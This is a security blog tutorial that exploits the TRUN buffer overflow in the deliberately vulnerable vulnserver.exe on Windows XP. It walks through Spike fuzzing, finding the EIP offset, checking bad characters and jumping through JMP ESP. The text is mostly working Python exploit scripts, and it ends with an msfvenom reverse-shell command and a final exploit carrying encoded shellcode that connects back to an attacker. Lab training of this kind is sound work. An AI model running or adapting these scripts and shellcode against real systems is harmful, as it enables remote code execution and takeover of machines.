Parzival's Security Blog : Bonus Content: How To Properly EXPLOIT A Buffer Overflow (2019 Revision)

Today, I will explain the mega process of buffer overflows by using the vulnserver.exe app.

Here is a quick diagram to explain buffer overflows: Related image

You can download it here: https://github.com/stephenbradshaw/vulnserver

Also, get yourself a copy of Windows XP Professional SP3: https://archive.org/details/WinXPProSP3x86

And, Kali Linux as well for python scripting to crash and exploit a shell over the buffer.

The serial is included inside the link as well.

It is free, since that version of Windows is already out of date.

Once you have Windows XP SP3 Professional 32-bit (64-bit will not work) installed, you can download Immunity Debugger, which is here in this link.

https://www.immunityinc.com/products/debugger/

We will use this to debug the buffer overflow.

First off, we must exploit the buffer of vulnserver.exe with Spike.

We also need to identify the protocol of vulnserver by using netcat.

nc -nv <WinXP IP address> 9999

Command line: nc -nv 192.168.83 9999

The purpose of this step is to identify the used protocol.

First step of the buffer overflow process: Spike!

Create Spike templates
Spike templates describe the package formats of the communication. We can tell Spike, which parameters should be tested. For example, the following template will try to send various commands to Vulnserver.

s_readline();
s_string_variable("COMMAND");

This template, however, will send STAT command with various parameters.

s_readline();
s_string("TRUN ");
s_string_variable("0");

We have a couple command, so that we can create similar templates for each command.

Spike is capable of sending both TCP and UDP packets. For now, we will use the generic_send_tcp command. The proper form is:

generic_send_tcp <IP address> <port number> <template name> <SKIPVAR> <SKIPSTR>

Before we start to send packages, we have to set the environment first.

On Windows XP, Start vulnserver.
Start Immunity Debugger and attach to Vulnserver, pres the play button so that the debugger is not started.
On Kali, start Wireshark and start capturing.

Let's start the command first: generic_send_tcp 192.168.1.83 9999 trun.spk 0 0

When there is a crash, we can find the last package in Wireshark. We can create a python script which sends the same package to the application. Then we will use this python script as proof of concept. For example trun.spk causes the application crash.

The crash happened at the second package. There is no welcome message after that. Let us find the package in Wireshark.

We have the format and size of the package that causes buffer overflow. The PoC python script:

#!/usr/bin/python

import socket
import os
import sys

host="192.168.1.83"
port=9999

buffer = "TRUN/.:/" + "A" * 5075

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send(buffer)
expl.close()

Part 2: Buffer Overflow!! :)

1. Identify the position of EIP

We sent 5075 “A” characters and EIP was overwritten with 41414141, which is the hex code of the “A” character. EIP was overwritten with our buffer. If we find the position of the EIP in our buffer, then we can overwrite it with any value.
There is a metasploit tool which generates a unique pattern. If we send it instead of “A” characters, then we can find out the offset with another metasploit module. Generate the unique pattern:

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 5075

Copy the pattern into the PoC python script:

Then, will deliver a payload to find the EIP pointer.

#!/usr/bin/python

import socket
import os
import sys

host="192.168.1.83"
port=9999

#buffer = "TRUN /.:/" + "A" * 5075
buffer = "TRUN /.:/" + "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk6Gk7Gk8Gk9Gl0Gl1Gl2Gl3Gl4Gl5Gl6Gl7Gl8Gl9Gm0Gm1Gm2Gm3Gm4Gm5Gm6Gm7Gm8Gm9Gn0Gn"

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send(buffer)
expl.close()

We now have the EIP value in our Immunity Debugger.

Now, we will have to execute the metasploit tool with a different value.

Looking back at the pattern_offset.rb tool, we can see that the extct offset would be 2003:

root@kali:~/Downloads/bufferOverflowPractice# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 386F4337

[*] Exact match at offset 2003

Update the PoC script the following way: First send 2003 A character, then send 4 B, then C characters.
… A A A A A | B B B B | C C C C C …

The updated PoC script will be:

#!/usr/bin/python

import socket
import os
import sys

host="192.168.1.83"
port=9999

buffer = "TRUN /.:/" + "A" * 2003 + "\x42\x42\x42\x42" + "C" * (5075 - 2003 - 4)

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send(buffer)
expl.close()

Now, the EIP value is overwritten with B's.

42424242 is equivalent to 4 B's in ASCII.

2. Check for bad characters

The buffer should not contain zero characters as it terminates the string and make our attack fail. We have to check if there is other bad characters. In order to do that, we send a buffer with each character and check it in the debugger.

#!/usr/bin/python

import socket
import os
import sys

host="192.168.1.83"
port=9999

chars=(
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

buffer = "TRUN /.:/" + "A" * 2003 + "\x42\x42\x42\x42" + chars + "C" * (5075 - 2003 - 4 - len(chars))

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send(buffer)
expl.close()

We can now see that the only bad character here is zero (0x00).

3. Find Address For EIP

In this step we have to check the registers and the stack. We have to find a way to jump to our buffer to execute our code. ESP points to the beginning of the C part of our buffer. We have to find a JMP ESP or CALL ESP instruction. Do not forget, that the address must not contain bad characters!
Open the executable modules list in OllyDbg (press the E letter on the toolbar). Select a module, for example the essfunc.dll. (Vulnserv would not be a good choice as its address contains zero!) Make sure that the dll is occupied!

Press right click on the code and select Search for/All commands. Enter JMP ESP. A couple of possible address is displayed. Select one.

My code could be different from yours according to jump addresses. #!/usr/bin/python

Remember that it has to be little endian notation because it is x86 architecture, which means that the first byte is backwards to forward.

Exploit Code:

import socket

import os

import sys

host="192.168.1.83"

port=9999

# 625011AF JMP ESP

buffer = "TRUN /.:/" + "A" * 2003 + "\xaf\x11\x50\x62" + "C" * (5075 - 2003 - 4)

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

expl.connect((host, port))

expl.send(buffer)

expl.close()

Try to send this buffer to Vulnserver, but first set a break point at the chosen address and let us see if it is hit.

It is hit. The 625011AF is returned by the EIP (stack pointer).

4. Popping the shell. Or, adding shellcode to the exploit.

Generate a shellcode with msfvenom:
msfvenom -a x86 –platform Windows -p windows/shell_reverse_tcp LHOST=<attacker’s IP address> LPORT=4444 -e x86/shikata_ga_nai -b ‘\x00’ -f python

Some encoder should be used as the windows/shell_reverse_tcp contains zero characters.
Place the generated code into the PoC script and update the buffer, so that the shellcode is placed after the EIP, in the C part. Place some NOP instructions before the shellcode. (NOP = 0x90). This is what you call the NOP SLED. The final exploit:

#!/usr/bin/python

import socket
import os
import sys

host="192.168.1.83"
port=9999

buf =  ""
buf += "\xb8\x6f\x21\x4d\x34\xd9\xcf\xd9\x74\x24\xf4\x5a\x29"
buf += "\xc9\xb1\x52\x31\x42\x12\x03\x42\x12\x83\xad\x25\xaf"
buf += "\xc1\xcd\xce\xad\x2a\x2d\x0f\xd2\xa3\xc8\x3e\xd2\xd0"
buf += "\x99\x11\xe2\x93\xcf\x9d\x89\xf6\xfb\x16\xff\xde\x0c"
buf += "\x9e\x4a\x39\x23\x1f\xe6\x79\x22\xa3\xf5\xad\x84\x9a"
buf += "\x35\xa0\xc5\xdb\x28\x49\x97\xb4\x27\xfc\x07\xb0\x72"
buf += "\x3d\xac\x8a\x93\x45\x51\x5a\x95\x64\xc4\xd0\xcc\xa6"
buf += "\xe7\x35\x65\xef\xff\x5a\x40\xb9\x74\xa8\x3e\x38\x5c"
buf += "\xe0\xbf\x97\xa1\xcc\x4d\xe9\xe6\xeb\xad\x9c\x1e\x08"
buf += "\x53\xa7\xe5\x72\x8f\x22\xfd\xd5\x44\x94\xd9\xe4\x89"
buf += "\x43\xaa\xeb\x66\x07\xf4\xef\x79\xc4\x8f\x14\xf1\xeb"
buf += "\x5f\x9d\x41\xc8\x7b\xc5\x12\x71\xda\xa3\xf5\x8e\x3c"
buf += "\x0c\xa9\x2a\x37\xa1\xbe\x46\x1a\xae\x73\x6b\xa4\x2e"
buf += "\x1c\xfc\xd7\x1c\x83\x56\x7f\x2d\x4c\x71\x78\x52\x67"
buf += "\xc5\x16\xad\x88\x36\x3f\x6a\xdc\x66\x57\x5b\x5d\xed"
buf += "\xa7\x64\x88\xa2\xf7\xca\x63\x03\xa7\xaa\xd3\xeb\xad"
buf += "\x24\x0b\x0b\xce\xee\x24\xa6\x35\x79\x8b\x9f\x34\x21"
buf += "\x63\xe2\x36\xc0\x2f\x6b\xd0\x88\xdf\x3d\x4b\x25\x79"
buf += "\x64\x07\xd4\x86\xb2\x62\xd6\x0d\x31\x93\x99\xe5\x3c"
buf += "\x87\x4e\x06\x0b\xf5\xd9\x19\xa1\x91\x86\x88\x2e\x61"
buf += "\xc0\xb0\xf8\x36\x85\x07\xf1\xd2\x3b\x31\xab\xc0\xc1"
buf += "\xa7\x94\x40\x1e\x14\x1a\x49\xd3\x20\x38\x59\x2d\xa8"
buf += "\x04\x0d\xe1\xff\xd2\xfb\x47\x56\x95\x55\x1e\x05\x7f"
buf += "\x31\xe7\x65\x40\x47\xe8\xa3\x36\xa7\x59\x1a\x0f\xd8"
buf += "\x56\xca\x87\xa1\x8a\x6a\x67\x78\x0f\x9a\x22\x20\x26"
buf += "\x33\xeb\xb1\x7a\x5e\x0c\x6c\xb8\x67\x8f\x84\x41\x9c"
buf += "\x8f\xed\x44\xd8\x17\x1e\x35\x71\xf2\x20\xea\x72\xd7"


# 625011AF   JMP ESP

buffer = "TRUN /.:/" + "A" * 2003 + "\xaf\x11\x50\x62" + "\x90" * 16 +  buf + "C" * (5075 - 2003 - 4 - 16 - len(buf))

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send(buffer)
expl.close()